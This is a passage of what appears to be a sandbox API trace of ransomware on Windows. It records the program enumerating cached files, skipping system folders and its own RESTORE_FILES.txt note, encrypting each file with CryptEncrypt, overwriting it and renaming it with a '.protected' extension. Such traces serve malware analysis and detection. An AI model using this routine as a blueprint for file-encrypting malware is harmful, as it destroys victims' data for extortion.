halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.protected")) returned 1 [0087.735] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.735] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Windows") returned -1 [0087.735] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Program Files") returned -1 [0087.735] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Program Files (x86)") returned -1 [0087.735] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="$Recycle.bin") returned 
1 [0087.735] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="System Volume Information") returned -1 [0087.735] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 151 [0087.735] StrStrIW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".protected") returned 0x0 [0087.735] lstrcmpW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="RESTORE_FILES.txt") returned -1 [0087.735] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.735] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.736] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 151 [0087.736] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".txt") returned 0x0 [0087.736] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 151 [0087.736] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".rar") returned 0x0 [0087.736] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 151 [0087.736] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".zip") returned 0x0 [0087.736] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xb68, lpOverlapped=0x0) returned 1 [0087.869] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff498, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.870] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xb68, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xb68, lpOverlapped=0x0) returned 1 [0087.870] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.870] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.870] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.870] CloseHandle (hObject=0x150) returned 1 [0087.870] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.protected") returned 161 [0087.870] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.protected")) returned 1 [0087.871] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.871] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="Windows") returned -1 [0087.871] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="Program Files") returned -1 [0087.871] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="Program Files (x86)") returned -1 [0087.871] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="$Recycle.bin") returned 1 [0087.871] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="System Volume Information") returned -1 [0087.871] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 151 [0087.871] StrStrIW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".protected") returned 0x0 [0087.871] lstrcmpW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="RESTORE_FILES.txt") returned -1 [0087.871] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.871] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.876] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 151 [0087.876] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".txt") returned 0x0 [0087.876] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 151 [0087.876] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".rar") returned 0x0 [0087.876] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 151 [0087.876] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".zip") returned 0x0 [0087.876] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0087.877] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.877] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0087.877] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.877] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.877] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.877] CloseHandle (hObject=0x150) returned 1 [0087.878] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.protected") returned 161 [0087.878] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.protected")) returned 1 [0087.878] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.878] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="Windows") returned -1 [0087.878] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="Program Files") returned -1 [0087.878] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="Program Files (x86)") returned -1 [0087.878] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="$Recycle.bin") returned 1 [0087.878] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="System Volume Information") returned -1 [0087.878] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 151 [0087.879] StrStrIW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".protected") returned 0x0 [0087.879] lstrcmpW 
(lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="RESTORE_FILES.txt") returned -1 [0087.879] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.879] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.879] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 151 [0087.879] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".txt") returned 0x0 [0087.879] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 151 [0087.879] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".rar") returned 0x0 [0087.879] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 151 [0087.879] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".zip") returned 0x0 [0087.879] ReadFile (in: 
hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x680, lpOverlapped=0x0) returned 1 [0087.945] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff980, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.946] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x680, lpOverlapped=0x0) returned 1 [0087.946] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.946] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.946] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.946] CloseHandle (hObject=0x150) returned 1 [0087.946] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.protected") returned 161 [0087.946] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.protected")) returned 1 [0087.947] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.947] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="Windows") returned -1 [0087.947] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="Program Files") returned -1 [0087.947] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="Program Files (x86)") returned -1 [0087.947] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="$Recycle.bin") returned 1 [0087.947] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="System Volume Information") returned -1 [0087.948] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 151 [0087.948] StrStrIW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".protected") returned 0x0 [0087.948] lstrcmpW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="RESTORE_FILES.txt") returned -1 [0087.948] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.948] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0087.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.952] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 151 [0087.952] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".txt") returned 0x0 [0087.952] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 151 [0087.952] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".rar") returned 0x0 [0087.952] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 151 [0087.952] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".zip") returned 0x0 [0087.952] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2d7, lpOverlapped=0x0) returned 1 [0088.052] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.052] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2d7, lpOverlapped=0x0) returned 1 [0088.052] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.052] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.053] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.053] CloseHandle (hObject=0x150) returned 1 [0088.053] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.protected") returned 161 [0088.053] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.protected")) returned 1 [0088.054] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0088.054] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="Windows") returned -1 [0088.054] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="Program Files") returned -1 [0088.054] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="Program Files (x86)") returned -1 [0088.054] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="$Recycle.bin") returned 1 [0088.054] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="System Volume Information") returned -1 [0088.054] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 151 [0088.054] StrStrIW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".protected") returned 0x0 [0088.054] lstrcmpW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="RESTORE_FILES.txt") returned -1 [0088.054] CryptGenRandom 